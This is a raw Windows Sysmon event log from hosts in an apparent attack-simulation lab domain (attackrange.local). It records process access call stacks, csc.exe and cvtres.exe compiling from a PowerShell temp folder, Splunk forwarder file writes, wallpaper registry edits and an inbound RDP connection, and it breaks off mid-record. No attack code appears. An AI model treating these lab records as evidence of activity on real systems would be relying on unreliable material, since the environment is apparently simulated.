09:22:04.116{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056057Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.116{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056056Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.116{5EBD8912-8D26-6151-8500-00000000FD01}27603956C:\Windows\system32\csrss.exe{5EBD8912-8D3C-6151-A000-00000000FD01}5584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001056055Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.116{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056054Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.116{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056053Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.116{5EBD8912-8D3B-6151-9F00-00000000FD01}55445548C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{5EBD8912-8D3C-6151-A000-00000000FD01}5584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001056052Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:04.120{5EBD8912-8D3C-6151-A000-00000000FD01}5584C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RES7044.tmp" "c:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\CSC69C054AE4EAE444FA3BD1D3A191A4DDF.TMP"C:\Windows\system32\ATTACKRANGE\Administrator{5EBD8912-8D28-6151-085E-080000000000}0x85e082HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{5EBD8912-8D3B-6151-9F00-00000000FD01}5544C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\0l4ej4k0\0l4ej4k0.cmdline" 23542300x8000000000000000980919Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:04.214{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=92F45DB10029ED3942AE031AC3F9DE7E,SHA256=F7D854D0714C47536793C7A384AAF11BBEF3041018D8583032C0ECB287402B77,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980922Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:22:05.918{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F75AE7EBF38769FEEBD4A954244E4069,SHA256=DA51646A036EBECEB2BD29DBC59B7B09D263181F479A7C56673DF8EBCB5A2D76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056094Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.960{5EBD8912-8D2A-6151-9600-00000000FD01}4632ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpgMD5=CE188002F2174FC802614D9546436AEE,SHA256=23F2F4038EF682DDCB2117F26C8FBA93055B9796ADDCEA0007CD5D7FEDF5BFA3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001056093Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:22:05.946{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXEHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Control Panel\Desktop\TranscodedImageCacheBinary Data 23542300x80000000000000001056092Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.835{5EBD8912-8D2A-6151-9600-00000000FD01}4632ATTACKRANGE\AdministratorC:\Windows\Explorer.EXEC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaperMD5=9F66C7A92669117D84AD0084B52D110D,SHA256=9F862D22987EEB12906CB8A85857828C5684B3BD1497D0FBB0F2B6ADA86A6EF6,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000001056091Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:22:05.819{5EBD8912-8D2A-6151-9600-00000000FD01}4632C:\Windows\Explorer.EXEHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Control Panel\Desktop\LastUpdatedDWORD (0xffffffff) 13241300x80000000000000001056090Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.localT1060,RunKeySetValue2021-09-27 09:22:05.819{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2741910449-3045839080-4200281267-500\Control Panel\Desktop\WallpaperC:\Users\Administrator\AppData\Local\Ec2Wallpaper_Info.jpg 10341000x80000000000000001056089Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.757{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001056088Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.659{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-56785-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 354300x80000000000000001056087Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:03.068{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54209-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001056086Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.522{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BD3AA1338BA759106168BB53EACF232D,SHA256=95CCC63AEF0AADFE2EA07431D1D63C5480916B888428F4FA81C1B6F289BB10EC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056085Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.476{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056084Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.476{5EBD8912-8CC0-6151-1000-00000000FD01}4401596C:\Windows\system32\svchost.exe{5EBD8912-8D37-6151-9D00-00000000FD01}2644C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6cc4|c:\windows\system32\fntcache.dll+17acf|c:\windows\system32\fntcache.dll+1a697|c:\windows\system32\fntcache.dll+1aacc|c:\windows\system32\fntcache.dll+5034e|c:\windows\system32\fntcache.dll+50052|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001056083Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.194{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056082Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.194{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056081Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.194{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056080Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.194{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056079Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.194{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2C-6151-9900-00000000FD01}5080C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056078Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.179{5EBD8912-8D29-6151-8D00-00000000FD01}41364420C:\Windows\system32\sihost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001056077Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.116{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=4362DD679DB477F9FF5DC490B6A339C0,SHA256=1648F5CA6285E02D5F5527EC53122CB5B48A1BD028B65AA2EC8990715339483E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001056076Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.100{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D35966EF97ACF6179437028E897B1C7A,SHA256=48F98137B34D6D2745EEC78D3CAEA63BEF50663D9772C8166AB4385F49186F64,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001056075Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.100{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001056074Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:22:05.100{5EBD8912-8CBF-6151-0C00-00000000FD01}844876C:\Windows\system32\svchost.exe{5EBD8912-8D2B-6151-9800-00000000FD01}4976C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCR